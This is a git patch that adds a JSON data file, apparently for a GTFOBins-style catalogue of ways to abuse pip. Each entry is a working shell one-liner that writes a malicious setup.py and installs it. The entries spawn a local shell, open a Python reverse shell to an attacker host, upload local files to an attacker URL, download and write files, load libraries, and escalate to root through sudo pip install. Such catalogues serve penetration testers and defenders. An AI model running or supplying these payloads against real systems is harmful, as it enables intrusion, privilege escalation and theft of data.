From 2a3167fb5a46294df37e954f240fc6b17acc7a86 Mon Sep 17 00:00:00 2001
From: t0thkr1s <t0thkr1s@icloud.com>
Date: Fri, 10 Jan 2020 12:46:37 +0100
Subject: [PATCH] add data for pip

---
 data/pip.json | 53 +++++++++++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 53 insertions(+)
 create mode 100644 data/pip.json

diff --git a/data/pip.json b/data/pip.json
new file mode 100644
index 0000000..f4d01f8
--- /dev/null
+++ b/data/pip.json
@@ -0,0 +1,53 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "code": "TF=$(mktemp -d)\necho \"import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')\" > $TF/setup.py\npip install $TF\n"
+      }
+    ],
+    "reverse-shell": [
+      {
+        "description": "Run 'socat file:`tty`,raw,echo=0 tcp-listen:[port]' on the attacker box to receive the shell.",
+        "code": "TF=$(mktemp -d)\necho 'import sys,socket,os,pty;s=socket.socket()\ns.connect((\"[host]\",[port]))\n[os.dup2(s.fileno(),fd) for fd in (0,1,2)]\npty.spawn(\"/bin/sh\")' > $TF/setup.py\npip install $TF\n"
+      }
+    ],
+    "file-upload": [
+      {
+        "description": "Send local file via 'd' parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.",
+        "code": "TF=$(mktemp -d)\necho 'import sys;\nif sys.version_info.major == 3: import urllib.request as r, urllib.parse as u\nelse: import urllib as u, urllib2 as r\nr.urlopen(\"[url]\", bytes(u.urlencode({\"d\":open(\"[file]\").read()}).encode()))' > $TF/setup.py\npip install $TF\n"
+      },
+      {
+        "description": "Serve files in the local folder running an HTTP server.",
+        "code": "TF=$(mktemp -d)\necho 'import sys;\nif sys.version_info.major == 3: import http.server as s, socketserver as ss\nelse: import SimpleHTTPServer as s, SocketServer as ss\nss.TCPServer((\"\", [port]), s.SimpleHTTPRequestHandler).serve_forever()' > $TF/setup.py\npip install $TF\n"
+      }
+    ],
+    "file-download": [
+      {
+        "description": "Fetch a remote file via HTTP GET request. It needs an absolute local file path.",
+        "code": "TF=$(mktemp -d)\necho 'import sys;\nif sys.version_info.major == 3: import urllib.request as r\nelse: import urllib as r\nr.urlretrieve(\"[url]\", \"[file]\")' > $TF/setup.py\npip install $TF\n"
+      }
+    ],
+    "file-write": [
+      {
+        "description": "It needs an absolute local file path.",
+        "code": "TF=$(mktemp -d)\necho \"open('[file]','w+').write('DATA')\" > $TF/setup.py\npip install $TF\n"
+      }
+    ],
+    "file-read": [
+      {
+        "description": "The read file content is corrupted as wrapped within an exception error.",
+        "code": "TF=$(mktemp -d)\necho 'raise Exception(open(\"file_to_read\").read())' > $TF/setup.py\npip install $TF\n"
+      }
+    ],
+    "library-load": [
+      {
+        "code": "TF=$(mktemp -d)\necho 'from ctypes import cdll; cdll.LoadLibrary(\"lib.so\")' > $TF/setup.py\npip install $TF\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "TF=$(mktemp -d)\necho \"import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')\" > $TF/setup.py\nsudo pip install $TF\n"
+      }
+    ]
+  }
+}
\ No newline at end of file